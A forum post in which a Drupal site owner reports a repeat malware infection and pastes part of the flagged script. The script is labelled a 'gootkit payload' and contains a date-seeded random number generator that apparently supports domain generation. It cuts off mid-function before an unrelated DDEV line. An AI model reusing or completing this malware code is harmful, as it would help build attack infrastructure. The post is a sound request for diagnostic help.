A few days ago I saw an emal come through from google that one of my sites was blacklisted because of a malware infection.
Checking, I found this was indeed correct and I did my best to remove the infected file and upgraded my Drupal core install from 6.16 to the latest version 6.26 and upgraded my theme and optional modules.
A subsequent scan with http://sitecheck.sucuri.net and http://urlquery.net/ showed it clear.
But 2 days later and it's infected again!
Have I done something wrong? The sucuri.net report shows the ISP is using Plesk 8. I briefly read that Plesk 8 is not secure and vulnerable.
Here is a copy of what was marked as a "malicious script"
//Congratulations! you have successfully extracted the gootkit payload
//this means i must work hardly :(
function nextRandomNumber() {
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if (test > 0) {
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix) {
var d = new Date(unix * 1000);
var s = Math.ceil(d.getHours() / 6);
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
DDEV is the official local development tool of Drupal. And like Drupal, DDEV depends on the support of the open source community.
